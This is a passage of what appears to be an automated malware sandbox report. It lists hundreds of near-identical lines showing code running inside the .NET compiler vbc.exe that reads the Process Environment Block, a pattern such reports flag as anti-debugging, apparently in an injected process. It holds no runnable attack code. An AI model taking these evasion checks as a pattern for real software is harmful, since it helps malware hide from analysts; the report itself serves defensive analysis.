            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058997A9 mov eax, dword ptr fs:[00000030h]5_2_058997A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0589F7AF mov eax, dword ptr fs:[00000030h]5_2_0589F7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0589F7AF mov eax, dword ptr fs:[00000030h]5_2_0589F7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0589F7AF mov eax, dword ptr fs:[00000030h]5_2_0589F7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0589F7AF mov eax, dword ptr fs:[00000030h]5_2_0589F7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0589F7AF mov eax, dword ptr fs:[00000030h]5_2_0589F7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058107AF mov eax, dword ptr fs:[00000030h]5_2_058107AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583D7B0 mov eax, dword ptr fs:[00000030h]5_2_0583D7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E37B6 mov eax, dword ptr fs:[00000030h]5_2_058E37B6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F7BA mov eax, dword ptr fs:[00000030h]5_2_0580F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F7BA mov eax, dword ptr fs:[00000030h]5_2_0580F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F7BA mov eax, dword ptr fs:[00000030h]5_2_0580F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F7BA mov eax, dword ptr fs:[00000030h]5_2_0580F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F7BA mov eax, dword ptr fs:[00000030h]5_2_0580F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F7BA mov eax, dword ptr fs:[00000030h]5_2_0580F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F7BA mov eax, dword ptr fs:[00000030h]5_2_0580F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F7BA mov eax, dword ptr fs:[00000030h]5_2_0580F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F7BA mov eax, dword ptr fs:[00000030h]5_2_0580F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581C7C0 mov eax, dword ptr fs:[00000030h]5_2_0581C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058157C0 mov eax, dword ptr fs:[00000030h]5_2_058157C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058157C0 mov eax, dword ptr fs:[00000030h]5_2_058157C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058157C0 mov eax, dword ptr fs:[00000030h]5_2_058157C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581D7E0 mov ecx, dword ptr fs:[00000030h]5_2_0581D7E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058327ED mov eax, dword ptr fs:[00000030h]5_2_058327ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058327ED mov eax, dword ptr fs:[00000030h]5_2_058327ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058327ED mov eax, dword ptr fs:[00000030h]5_2_058327ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058147FB mov eax, dword ptr fs:[00000030h]5_2_058147FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058147FB mov eax, dword ptr fs:[00000030h]5_2_058147FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05817703 mov eax, dword ptr fs:[00000030h]5_2_05817703
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05815702 mov eax, dword ptr fs:[00000030h]5_2_05815702
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05815702 mov eax, dword ptr fs:[00000030h]5_2_05815702
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584C700 mov eax, dword ptr fs:[00000030h]5_2_0584C700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05810710 mov eax, dword ptr fs:[00000030h]5_2_05810710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05840710 mov eax, dword ptr fs:[00000030h]5_2_05840710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584F71F mov eax, dword ptr fs:[00000030h]5_2_0584F71F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584F71F mov eax, dword ptr fs:[00000030h]5_2_0584F71F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05813720 mov eax, dword ptr fs:[00000030h]5_2_05813720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582F720 mov eax, dword ptr fs:[00000030h]5_2_0582F720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582F720 mov eax, dword ptr fs:[00000030h]5_2_0582F720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582F720 mov eax, dword ptr fs:[00000030h]5_2_0582F720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058CF72E mov eax, dword ptr fs:[00000030h]5_2_058CF72E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584C720 mov eax, dword ptr fs:[00000030h]5_2_0584C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584C720 mov eax, dword ptr fs:[00000030h]5_2_0584C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D972B mov eax, dword ptr fs:[00000030h]5_2_058D972B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05809730 mov eax, dword ptr fs:[00000030h]5_2_05809730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05809730 mov eax, dword ptr fs:[00000030h]5_2_05809730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05845734 mov eax, dword ptr fs:[00000030h]5_2_05845734
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058EB73C mov eax, dword ptr fs:[00000030h]5_2_058EB73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058EB73C mov eax, dword ptr fs:[00000030h]5_2_058EB73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058EB73C mov eax, dword ptr fs:[00000030h]5_2_058EB73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058EB73C mov eax, dword ptr fs:[00000030h]5_2_058EB73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584273C mov eax, dword ptr fs:[00000030h]5_2_0584273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584273C mov ecx, dword ptr fs:[00000030h]5_2_0584273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584273C mov eax, dword ptr fs:[00000030h]5_2_0584273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0588C730 mov eax, dword ptr fs:[00000030h]5_2_0588C730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581973A mov eax, dword ptr fs:[00000030h]5_2_0581973A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581973A mov eax, dword ptr fs:[00000030h]5_2_0581973A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05823740 mov eax, dword ptr fs:[00000030h]5_2_05823740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05823740 mov eax, dword ptr fs:[00000030h]5_2_05823740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05823740 mov eax, dword ptr fs:[00000030h]5_2_05823740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E3749 mov eax, dword ptr fs:[00000030h]5_2_058E3749
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584674D mov esi, dword ptr fs:[00000030h]5_2_0584674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584674D mov eax, dword ptr fs:[00000030h]5_2_0584674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584674D mov eax, dword ptr fs:[00000030h]5_2_0584674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05810750 mov eax, dword ptr fs:[00000030h]5_2_05810750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852750 mov eax, dword ptr fs:[00000030h]5_2_05852750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852750 mov eax, dword ptr fs:[00000030h]5_2_05852750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05894755 mov eax, dword ptr fs:[00000030h]5_2_05894755
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580B765 mov eax, dword ptr fs:[00000030h]5_2_0580B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580B765 mov eax, dword ptr fs:[00000030h]5_2_0580B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580B765 mov eax, dword ptr fs:[00000030h]5_2_0580B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580B765 mov eax, dword ptr fs:[00000030h]5_2_0580B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05818770 mov eax, dword ptr fs:[00000030h]5_2_05818770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820770 mov eax, dword ptr fs:[00000030h]5_2_05820770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820770 mov eax, dword ptr fs:[00000030h]5_2_05820770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820770 mov eax, dword ptr fs:[00000030h]5_2_05820770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820770 mov eax, dword ptr fs:[00000030h]5_2_05820770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820770 mov eax, dword ptr fs:[00000030h]5_2_05820770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820770 mov eax, dword ptr fs:[00000030h]5_2_05820770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820770 mov eax, dword ptr fs:[00000030h]5_2_05820770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820770 mov eax, dword ptr fs:[00000030h]5_2_05820770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820770 mov eax, dword ptr fs:[00000030h]5_2_05820770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820770 mov eax, dword ptr fs:[00000030h]5_2_05820770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820770 mov eax, dword ptr fs:[00000030h]5_2_05820770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820770 mov eax, dword ptr fs:[00000030h]5_2_05820770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0589368C mov eax, dword ptr fs:[00000030h]5_2_0589368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0589368C mov eax, dword ptr fs:[00000030h]5_2_0589368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0589368C mov eax, dword ptr fs:[00000030h]5_2_0589368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0589368C mov eax, dword ptr fs:[00000030h]5_2_0589368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05814690 mov eax, dword ptr fs:[00000030h]5_2_05814690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05814690 mov eax, dword ptr fs:[00000030h]5_2_05814690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584C6A6 mov eax, dword ptr fs:[00000030h]5_2_0584C6A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580D6AA mov eax, dword ptr fs:[00000030h]5_2_0580D6AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580D6AA mov eax, dword ptr fs:[00000030h]5_2_0580D6AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058076B2 mov eax, dword ptr fs:[00000030h]5_2_058076B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058076B2 mov eax, dword ptr fs:[00000030h]5_2_058076B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058076B2 mov eax, dword ptr fs:[00000030h]5_2_058076B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058466B0 mov eax, dword ptr fs:[00000030h]5_2_058466B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581B6C0 mov eax, dword ptr fs:[00000030h]5_2_0581B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581B6C0 mov eax, dword ptr fs:[00000030h]5_2_0581B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581B6C0 mov eax, dword ptr fs:[00000030h]5_2_0581B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581B6C0 mov eax, dword ptr fs:[00000030h]5_2_0581B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581B6C0 mov eax, dword ptr fs:[00000030h]5_2_0581B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581B6C0 mov eax, dword ptr fs:[00000030h]5_2_0581B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D16CC mov eax, dword ptr fs:[00000030h]5_2_058D16CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D16CC mov eax, dword ptr fs:[00000030h]5_2_058D16CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D16CC mov eax, dword ptr fs:[00000030h]5_2_058D16CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D16CC mov eax, dword ptr fs:[00000030h]5_2_058D16CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584A6C7 mov ebx, dword ptr fs:[00000030h]5_2_0584A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584A6C7 mov eax, dword ptr fs:[00000030h]5_2_0584A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058CF6C7 mov eax, dword ptr fs:[00000030h]5_2_058CF6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058416CF mov eax, dword ptr fs:[00000030h]5_2_058416CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583D6E0 mov eax, dword ptr fs:[00000030h]5_2_0583D6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583D6E0 mov eax, dword ptr fs:[00000030h]5_2_0583D6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058A36EE mov eax, dword ptr fs:[00000030h]5_2_058A36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058A36EE mov eax, dword ptr fs:[00000030h]5_2_058A36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058A36EE mov eax, dword ptr fs:[00000030h]5_2_058A36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058A36EE mov eax, dword ptr fs:[00000030h]5_2_058A36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058A36EE mov eax, dword ptr fs:[00000030h]5_2_058A36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058A36EE mov eax, dword ptr fs:[00000030h]5_2_058A36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058436EF mov eax, dword ptr fs:[00000030h]5_2_058436EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058906F1 mov eax, dword ptr fs:[00000030h]5_2_058906F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058906F1 mov eax, dword ptr fs:[00000030h]5_2_058906F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0588E6F2 mov eax, dword ptr fs:[00000030h]5_2_0588E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0588E6F2 mov eax, dword ptr fs:[00000030h]5_2_0588E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0588E6F2 mov eax, dword ptr fs:[00000030h]5_2_0588E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0588E6F2 mov eax, dword ptr fs:[00000030h]5_2_0588E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058CD6F0 mov eax, dword ptr fs:[00000030h]5_2_058CD6F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0588E609 mov eax, dword ptr fs:[00000030h]5_2_0588E609
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05841607 mov eax, dword ptr fs:[00000030h]5_2_05841607
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584F603 mov eax, dword ptr fs:[00000030h]5_2_0584F603
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582260B mov eax, dword ptr fs:[00000030h]5_2_0582260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582260B mov eax, dword ptr fs:[00000030h]5_2_0582260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582260B mov eax, dword ptr fs:[00000030h]5_2_0582260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582260B mov eax, dword ptr fs:[00000030h]5_2_0582260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582260B mov eax, dword ptr fs:[00000030h]5_2_0582260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582260B mov eax, dword ptr fs:[00000030h]5_2_0582260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582260B mov eax, dword ptr fs:[00000030h]5_2_0582260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05813616 mov eax, dword ptr fs:[00000030h]5_2_05813616
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05813616 mov eax, dword ptr fs:[00000030h]5_2_05813616
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852619 mov eax, dword ptr fs:[00000030h]5_2_05852619
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05846620 mov eax, dword ptr fs:[00000030h]5_2_05846620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05848620 mov eax, dword ptr fs:[00000030h]5_2_05848620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582E627 mov eax, dword ptr fs:[00000030h]5_2_0582E627
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F626 mov eax, dword ptr fs:[00000030h]5_2_0580F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F626 mov eax, dword ptr fs:[00000030h]5_2_0580F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F626 mov eax, dword ptr fs:[00000030h]5_2_0580F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F626 mov eax, dword ptr fs:[00000030h]5_2_0580F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F626 mov eax, dword ptr fs:[00000030h]5_2_0580F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F626 mov eax, dword ptr fs:[00000030h]5_2_0580F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F626 mov eax, dword ptr fs:[00000030h]5_2_0580F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F626 mov eax, dword ptr fs:[00000030h]5_2_0580F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F626 mov eax, dword ptr fs:[00000030h]5_2_0580F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581262C mov eax, dword ptr fs:[00000030h]5_2_0581262C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E5636 mov eax, dword ptr fs:[00000030h]5_2_058E5636
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582C640 mov eax, dword ptr fs:[00000030h]5_2_0582C640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D866E mov eax, dword ptr fs:[00000030h]5_2_058D866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D866E mov eax, dword ptr fs:[00000030h]5_2_058D866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584A660 mov eax, dword ptr fs:[00000030h]5_2_0584A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584A660 mov eax, dword ptr fs:[00000030h]5_2_0584A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05849660 mov eax, dword ptr fs:[00000030h]5_2_05849660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05849660 mov eax, dword ptr fs:[00000030h]5_2_05849660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05842674 mov eax, dword ptr fs:[00000030h]5_2_05842674
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05850185 mov eax, dword ptr fs:[00000030h]5_2_05850185
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058CC188 mov eax, dword ptr fs:[00000030h]5_2_058CC188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058CC188 mov eax, dword ptr fs:[00000030h]5_2_058CC188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0589019F mov eax, dword ptr fs:[00000030h]5_2_0589019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0589019F mov eax, dword ptr fs:[00000030h]5_2_0589019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0589019F mov eax, dword ptr fs:[00000030h]5_2_0589019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0589019F mov eax, dword ptr fs:[00000030h]5_2_0589019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05867190 mov eax, dword ptr fs:[00000030h]5_2_05867190
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580A197 mov eax, dword ptr fs:[00000030h]5_2_0580A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580A197 mov eax, dword ptr fs:[00000030h]5_2_0580A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580A197 mov eax, dword ptr fs:[00000030h]5_2_0580A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058C11A4 mov eax, dword ptr fs:[00000030h]5_2_058C11A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058C11A4 mov eax, dword ptr fs:[00000030h]5_2_058C11A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058C11A4 mov eax, dword ptr fs:[00000030h]5_2_058C11A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058C11A4 mov eax, dword ptr fs:[00000030h]5_2_058C11A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582B1B0 mov eax, dword ptr fs:[00000030h]5_2_0582B1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E51CB mov eax, dword ptr fs:[00000030h]5_2_058E51CB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D61C3 mov eax, dword ptr fs:[00000030h]5_2_058D61C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D61C3 mov eax, dword ptr fs:[00000030h]5_2_058D61C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584D1D0 mov eax, dword ptr fs:[00000030h]5_2_0584D1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584D1D0 mov ecx, dword ptr fs:[00000030h]5_2_0584D1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E61E5 mov eax, dword ptr fs:[00000030h]5_2_058E61E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058351EF mov eax, dword ptr fs:[00000030h]5_2_058351EF
